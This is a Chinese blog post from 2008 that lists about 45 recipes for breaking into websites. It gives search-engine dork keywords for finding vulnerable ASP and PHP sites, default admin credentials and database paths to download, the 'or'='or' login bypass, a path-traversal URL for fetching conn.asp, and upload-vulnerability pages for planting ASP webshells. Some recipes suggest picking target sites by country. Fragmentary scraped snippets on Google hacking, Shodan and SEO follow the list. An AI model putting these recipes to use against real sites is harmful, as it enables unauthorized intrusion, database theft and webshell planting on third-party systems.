用google搜关键字找网站漏洞!2008年05月12日星期一下午01:161:到GoogLe,搜索一些关键字,edit.asp?韩国肉鸡为多,多数为MSSQL数据库!
2,到Google,site:cq.cninurl:asp
3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆
4,这个应该N多人都搞过吧。。
关键字:CoNetMIBVer1.0网站后台管理系统
帐号密码为'or'='or'
5.动感购物系统呵呵。想到了明小子
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞
6。默认数据库地址blogdata/acblog.asa
关键字:acblog
7.
百度/htdocs
注册里可以直接上传asa文件!
8.
/Database/#newasp.mdb
关键词:NewAspSiteManageSystemVersion
9.
用挖掘机
关键字:PoweredbyWEBBOY
页面:/upfile.asp
这个。。。。。。。不用说了。--!
10.
baidu中搜索关键字Ver5.0Build0519
(存在上传漏洞)
11.
Upfile_Article.aspbbs/upfile.asp
输入关键字:poweredbymypower,
应该是动什么上传漏洞来着?用的人也比较多
工具明小子挖掘鸡就可以了
12.
inurl:winnt\system32\inetsrv\
在google里面输入这个就可以找到很多网站
13.
现在GOOGLE搜索关键字intitle:网站小助手inurl:asp
14.
关键字:首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛
挖掘鸡的关键字添setup.asp
15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手下载地址:百度Google!
2.Google
关键字:
Poweredby:vBulletinVersion3.0.1
Poweredby:vBulletinVersion3.0.2
Poweredby:vBulletinVersion3.0.3
其中一个就可以了
16.
1.打开百度或GOOGLE搜索,输入poweredbycomersusASPshoppingcart
opensource。
这是一个商场系统。
2.网站的最底部分,有个ComersusOpenTechnologiesLC。打开看下~~comersus系统~
猜到,comersus.mdb.是数据库名
数据库都是放在database/后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb试试
都是默认数据库地址
17.无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
或者是http://您的域名/admin.asp
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir或msmir
数据库文件为http://您的域名/msmirdata/msmirArticle.mdb
或者是http://您的域名/msmirdata/msmirArticle.asa
数据库连接文件为***********/Conn.asp
也是默认数据库地址。现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`
18.
百度里输入/skins/default/
这个没试过。。。
19.利用挖掘机
关键机:powerbyDiscuz
路径:/wish.php
配合:
Discuz!论坛wish.php远程包含漏洞
20.
上传漏洞.
工具:当然还是明小子了
网站猎手或者挖掘鸡了。
关键字poweredbymypower
检测的页面或文件插入upfile_photo.asp
这个用的人也N多。。
21.新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字"关于本站-网站帮助-广告合作-下载声明-友情连接-网站地图-管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了#可以用%23替换就可以下载了
\database\%23newasp.mdb
如:#xzws.mdb改成%23xzws.mdb
22.
通吃所有商城+动力上传系统
使用工具:挖掘鸡v1.1明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
还是上传漏洞拿webshell
23.
注射漏洞
百度搜索:oioj'sblog
24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'
这软件还不是太熟悉。--
26.
入侵魔兽私服
需要的工具:ASP木马--!废话了。
明小子
关键字:AllRightReservedDesign:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb
都默认的。数据库闹下来自己解密吧不多说了。
27.
漏洞是利用管理员iis设置的失误
用baidu关键字就是比较罕见的脚本名
动网:ReloadForumCache.asp
Leadbbs:makealltopanc.asp
BBSXP:admin_fso.asp
动易:admin_articlerecyclebin.asp
28.
国外站的爆库漏洞
关键字:sadRaven'sGuestbook
密码地址:/passwd.dat
后台地址:/admin.php
29.
Discuz4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:"intext:Discuz!4.1.0"
WAP浏览器..............................!!
30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马
31.
工具
1:网站猎手
2:大马
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp
32.
关键字:Team5StudioAllrightsreserved
默认数据库:data/team.mdb
33.
工具:挖掘机辅臣数据库读取器
关键字:企业简介产品展示产品列表
后缀添加:/database/myszw.mdb
后台地址:admin/Login.asp
都默认的。一样。数据库闹下来自己解密码去。就行了。。--
34.
关键子XXXinurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到在config.asp内。
35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData动网数据库备份默认路径
36.
工具:网站猎手WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'
37.
关键字:Poweredby:QCDN_NEWS
随便扫遍文章加一个',来试探注入点
后台地址:admin_index.asp
用啥工具我就不说了吧。。。。。。。。。
38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppicanran.asp登陆马.
39.
工具挖掘机就行了。
关键字:PowerSystemOfArticleManagementVer3.0Build20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
工具明小子。--!怎么又是他啊。
MD5自己解.........
(NND这个一扫一大堆。大家可以去试试。。)
40.
一、通过GOOGLE搜索找大量注入点
关键字:asp?id=1gov.jp/asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧
42
关键字:Poweredby:94KKBBS2005
利用密码找回功能找回admin
提问:ddddd回答:ddddd
42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码:'or'='或者'or''=''or'登录进入
默认数据库地址:Database/DataShop.mdb
43.
关键字:******inurl:readnews.asp
把最后一个/改成%5c,直接暴库,看密码,进后台
随便添加个新闻在标题输入我们的一句话木马
44.
工具:一句话木马
BBsXp5.0sp1管理员猜解器
关键词:poweredbybbsxp5.00
进后台,备份一句话马!
45.
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin
分享到:
相关推荐
例如,使用减号"-"可以强制搜索引擎结果中不出现某个关键字,使用星号"*"则可以进行模糊搜索,允许结果中出现多种相关的关键词。这些符号的使用能够帮助攻击者更精确地定位和搜集到相关的信息。 在Web安全的学习和...
- `Googledorkssqlinjection:`:这一类关键词通常用来通过Google搜索引擎发现可能存在SQL注入漏洞的网站。 - `inurl:index.php?id=`:这类URL模式常见于基于PHP的网站,通常用于主页或列表页。 **这类关键词可以...
与普通的搜索引擎不同,Shodan不仅仅能搜索网站内容,它能够提供对互联网上各种设备和服务的详细洞察。以下是Shodan搜索引擎的一些核心特性和使用方法: 1. 设备搜索:Shodan允许用户通过关键字、IP地址、端口号等...
6. Black-Hat SEO(黑帽优化手段):黑帽SEO是指利用搜索引擎漏洞和缺陷来提升排名的不道德方法,如关键字堆砌、隐藏文本等。这种做法可能导致网站被搜索引擎惩罚或剔除。白帽SEO则遵循搜索引擎的规则,通过提供优质...
在互联网营销和SEO(搜索引擎优化)领域,这种行为被视为黑帽SEO策略,因为它违反了搜索引擎的规则,可能导致网站被搜索引擎降权甚至屏蔽。 垃圾站的生成主要依赖于以下几个关键知识点: 1. 关键字填充:这是一种...
7.后台违法关键字过滤 8.网站智能分类 9.违法作弊网站一键删除 10.网站登录入口 11.信息反馈留言板 12.搜索右侧自定义广告 13.已收录网站和网页统计 14.网站一键收录 15.web蜘蛛系统 16.wap系统 17.后台...
当前在线列表,今日访问者列表,最近24小时统计,今日来路统计,今日搜索引擎,今日搜索关键字,昨日时段统计,网站统计摘要,小时统计报表,日统计报表,Alexa工具条统计,周统计报表,月统计报表,年统计报表,...
SEO之关键字挖掘 SEO 之关键字挖掘 做网站推广和网站搜索引擎优化 SEO 关键字的选择是很重要的....不单是 SEO,研究互联网趋势和热点也是不错的 东西. 6.预测,这个很多人也说到了.先下手为强,预测热门的关...
百度 或者谷歌搜索引擎搜索相关的关键字 , 特殊端口扫描
当前在线列表,今日访问者列表,最近24小时统计,今日来路统计,今日搜索引擎,今日搜索关键字,昨日时段统计,网站统计摘要,小时统计报表,日统计报表,Alexa工具条统计,周统计报表,月统计报表,年统计报表,...
- **定义**:谷歌语法是指使用特定的符号和结构来优化谷歌搜索引擎查询的方法。通过这些特殊的语法,用户可以更精确地定位所需的信息或网页。 - **作用**:在信息安全领域,特别是渗透测试过程中,谷歌语法可以帮助...
本文将围绕“Google入侵网站常用关键词汇总”这一主题展开,详细解析通过Google搜索引擎来查找可能存在安全风险的网站或系统的方法与技巧。 #### 二、关键词详解 1. **Google, һЩؼ, edit.asp?**: 这种类型的...
同时,我们也可以使用搜索引擎来搜索教育机构的公开信息,例如使用 Google 语法来搜索 edu.cn 域名下的 PDF 和 DOCX 文件,以获取教育机构的敏感信息。 在信息搜集阶段,我们需要注意以下几点: * 确定站点:我们...
这款工具的核心特性是通过FOFA搜索引擎接口,对网络上公开的互联网资产进行快速定位和分析。 **一、FOFA搜索引擎** FOFA(Find Of All)是由白帽汇安全研究院开发的一款网络资产搜索引擎,它拥有海量的互联网资源...
我们可以使用Google搜索引擎,使用关键字“Powered by PHP168 V4.0”进行搜索,就能找到数万个相关记录。 攻击思路 我们可以构造一个恶意的PHP木马,通过Log in.php文件的缓存机制,写入恶意代码,从而获取网站的...
如果网站存在安全漏洞,不仅可能影响百度权重,还可能导致搜索引擎的惩罚。因此,修复所有已知的安全漏洞至关重要,同时应清除论坛中的黑链,避免因黑帽SEO行为受到搜索引擎的负面影响。 其次,处理死链接也是SEO...
这一模块是自动化标注引擎的重要组成部分,它通过模拟人工操作,使用正则匹配提取关键字,并利用搜索引擎API获取包含这些关键字的网页。通过提取网页的文本数据并结合本地依赖词库,来编写能够描述设备信息的规则。 ...
这个系统可能旨在帮助网站提升在百度搜索引擎中的排名,但请注意,使用此类工具进行搜索引擎作弊是违反百度的搜索引擎政策,可能会导致网站被惩罚或甚至被搜索引擎完全剔除。 ASP(Active Server Pages)是微软开发...
### 利用搜索引擎查找注入点 在网络安全领域中,“注入点”是指系统接受用户输入的地方,如果这些输入没有经过适当的安全验证,就可能被恶意利用,导致数据泄露、篡改等安全问题。其中,SQL注入是最常见的攻击方式...